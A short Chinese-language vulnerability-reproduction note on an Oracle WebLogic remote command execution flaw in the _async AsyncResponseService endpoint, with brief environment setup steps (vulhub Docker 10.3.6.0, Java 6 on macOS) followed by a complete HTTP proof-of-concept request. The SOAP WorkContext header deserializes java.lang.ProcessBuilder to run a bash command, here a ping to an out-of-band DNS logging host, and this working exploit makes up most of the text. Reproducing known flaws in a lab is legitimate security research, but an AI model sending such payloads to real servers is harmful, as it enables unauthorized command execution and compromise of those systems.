参考:
最新weblogic漏洞复现
weblogic CVE-2019-2647等相关XXE漏洞分析
环境搭建:
在12.2.1.3版本上访问url发现404了,
使用vulhub之前的docker镜像,10.3.6.0版本:
也可以在MacOS上搭建环境,不过需要Java6,需要在这里下载:
https://support.apple.com/kb/dl1572?locale=zh_CN
https://updates.cdn-apple.com/2018/macos/031-33898-20171026-7a797e9e-b8de-11e7-b1fe-c14fbda7e146/javaforosx.dmg
下载完之后安装,会在/Library/Java/JavaVirtualMachines
下生成1.6.0.jdk
目录。
PoC:
POST /_async/AsyncResponseService HTTP/1.1
Host: cqq.com:7001
Content-Length: 946
Accept-Encoding: gzip, deflate
SOAPAction:
Accept: */*
User-Agent: Apache-HttpClient/4.1.1 (java 1.5)
Connection: keep-alive
content-type: text/xml
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing" xmlns:asy="http://www.bea.com/async/AsyncResponseService">
<soapenv:Header>
<wsa:Action>xx</wsa:Action>
<wsa:RelatesTo>xx</wsa:RelatesTo>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>/bin/bash</string>
</void>
<void index="1">
<string>-c</string>
</void>
<void index="2">
<string>/bin/ping weblogic.fd49566cf2867bbbe5c4.d.zhack.ca</string>
</void>
</array>
<void method="start"/>
</void>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body>
<asy:onAsyncDelivery/>
</soapenv:Body>
</soapenv:Envelope>